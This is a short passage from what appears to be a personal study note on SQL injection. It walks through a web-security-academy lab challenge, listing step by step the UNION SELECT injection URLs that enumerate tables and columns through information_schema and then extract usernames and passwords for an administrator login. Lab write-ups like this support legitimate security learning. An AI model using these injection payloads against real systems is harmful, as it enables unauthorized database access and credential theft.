machevalia/WebApplicationTesting/SQL Injections/SQL Injection.md

 MyDatabase     dbo           Users       Password     varchar This output shows the columns in the specified table and the data type of each column.

-## Challenge
-Get the database and table information out of the database in Shop via the Category param vulnerability to get the username and password for administrator then login.

-First, determine number of columns.
-Second, list table names from information_schema.tables - https://0a4f00e4033d3a1fde03c8b600d0007e.web-security-academy.net/filter?category=Gifts%27+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
-Third, select the column names from the table from information_schema.columns - https://0a4f00e4033d3a1fde03c8b600d0007e.web-security-academy.net/filter?category=Gifts%27+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns%20WHERE%20table_name=%27users_brauzl%27--
-Finally, extract the usernames and passwords from the table users_brauzl and the columns found - https://0a4f00e4033d3a1fde03c8b600d0007e.web-security-academy.net/filter?category=Gifts%27%20UNION%20SELECT%20username_onopjk,%20password_bikvfm%20FROM%20users_brauzl%20--

 # Blind SQL injection
 In this section, we describe techniques for finding and exploiting blind SQL injection vulnerabilities.